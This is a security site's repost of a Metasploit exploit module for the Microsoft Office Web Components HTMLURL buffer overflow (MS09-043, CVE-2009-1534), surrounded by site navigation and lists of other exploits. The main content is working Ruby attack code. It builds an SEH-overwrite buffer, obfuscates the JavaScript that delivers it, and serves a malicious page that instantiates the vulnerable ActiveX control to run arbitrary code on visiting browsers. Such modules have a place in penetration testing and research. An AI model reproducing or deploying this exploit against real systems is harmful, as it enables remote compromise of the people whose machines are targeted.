首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft OWC Spreadsheet HTMLURL Buffer Overflow(meta)
来源:http://www.metasploit.com 作者:jduck 发布时间:2010-03-04  
##
# $Id: ms09_043_owc_htmlurl.rb 8698 2010-03-03 18:12:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft OWC Spreadsheet HTMLURL Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in Microsoft's Office Web Components.
				When passing an overly long string as the "HTMLURL" parameter an attacker can 
				execute arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'jduck' ],
			'Version'        => '$Revision: 8698 
, 'References' => [ [ 'CVE', '2009-1534' ], [ 'OSVDB', '56916' ], [ 'BID', '35992' ], [ 'MSB', 'MS09-043' ], [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=819' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\xf0", 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ # 'ProgId' => "OWC.Spreadsheet.9" # 'ClassId' => "0002E512-0000-0000-C000-000000000046", [ 'Windows XP SP3 - IE6 - Office XP SP0', { 'ClassId' => "0002E510-0000-0000-C000-000000000046", 'Offset' => 31337, 'Ret' => 0x42424242 # p/p/r in msohev.dll ?? } ], [ 'Windows XP SP3 - IE6 - Office XP SP3', { 'ClassId' => "0002E511-0000-0000-C000-000000000046", 'Offset' => ((4096*7) + 1076), 'Ret' => 0x32521239 # p/p/r in msohev.dll 10.0.2609.0 } ] ], 'DisclosureDate' => 'Aug 11 2009', 'DefaultTarget' => 1)) register_options( [ OptString.new('URIPATH', [ true, "The URI to use.", "/" ]) ], self.class) end def autofilter false end def check_dependencies use_zlib end def big_alnum(num) divisor = 2048 + rand(2048) pad_pages = num / divisor pad_left = num % divisor ret = '' ret << rand_text_alphanumeric(divisor) * pad_pages if pad_pages ret << rand_text_alphanumeric(pad_left) if pad_left ret end def on_request_uri(cli, request) # Re-generate the payload. return if ((p = regenerate_payload(cli)) == nil) # ActiveX parameter(s) clsid = target['ClassId'] # Exploitation parameter(s) seh_offset = target['Offset'] # Build the buffer. string = big_alnum(seh_offset) string << generate_seh_record(target.ret) string << payload.encoded string << big_alnum(40960 - string.length) string = Rex::Text.to_unescape(string) objid = rand_text_alphanumeric(8+rand(8)) fnname = rand_text_alphanumeric(8+rand(8)) # Build the final JavaScript js = "function #{fnname}() { var long = unescape('#{string}'); #{objid}.HTMLURL = long; }" # Obfuscate the javascript opts = { 'Strings' => false, # way too slow to obfuscate this monster 'Symbols' => { 'Variables' => %w{ long } } } js = ::Rex::Exploitation::ObfuscateJS.new(js, opts) js.obfuscate() # Build the final HTML content = %Q|<html> <head> <script language=javascript> #{js} </script> </head> <body onload="history.go(0); #{fnname}()"> <object classid="clsid:#{clsid}" id="#{objid}"> </object> </body> </html> | print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content, { 'Last-Modified' => 'Tue, 11 Aug 2009 07:13:46 GMT', }) # Handle the payload handler(cli) end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MiNBank 1.5.0 Remote Command E
·McAfee LinuxShield versions 1.
·Opera <= 10.50 integer overflo
·WebEx UCF atucfobj.dll ActiveX
·ProSSHD v1.2 20090726 Buffer O
·Linux x86 - disabled modsecuri
·Mozilla Firefox v3.6 and Opera
·AKoff MIDI Player v1.00 Buffer
·Internet Explorer 'winhlp32.ex
·WinSmMuPl 1.2.5 (.mp3) Local C
·Tod Miller Sudo 1.6.x before 1
·Sagem Routers Remote Reset Exp
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved